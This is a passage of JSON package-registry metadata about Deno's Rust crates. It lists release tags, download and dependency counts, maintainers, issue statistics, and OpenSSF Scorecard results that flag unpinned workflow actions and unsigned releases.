":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T08:01:17.530Z","dependent_packages_count":20,"downloads":1568634,"downloads_period":"total","dependent_repos_count":191,"rankings":{"downloads":3.9071678090451476,"dependent_repos_count":2.8252412075941487,"dependent_packages_count":2.113076019388017,"stargazers_count":0.002334030949250387,"forks_count":0.05912878404767647,"docker_downloads_count":3.08896531333157,"average":1.9993188607259684},"purl":"pkg:cargo/deno_webidl","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_webidl","docker_dependents_count":30,"docker_downloads_count":23282372,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_webidl","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_webidl/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webidl/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webidl/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webidl/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webidl/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webidl/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webidl/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:38.484Z","updated_at":"2022-11-07T18:29:38.484Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:23.909Z","updated_at":"2023-07-18T22:41:23.909Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11067580,"name":"lib_node_resolver","ecosystem":"cargo","description":"Node.js module resolution algorithm used in Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":5,"first_release_published_at":"2024-11-20T17:35:11.389Z","latest_release_published_at":"2024-11-20T18:24:58.314Z","latest_release_number":"0.17.4","last_synced_at":"2026-08-29T21:57:06.202Z","created_at":"2024-11-20T17:46:24.996Z","updated_at":"2026-08-29T21:57:06.202Z","registry_url":"https://crates.io/crates/lib_node_resolver/","install_command":"cargo install lib_node_resolver","documentation_url":"https://docs.rs/lib_node_resolver/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using 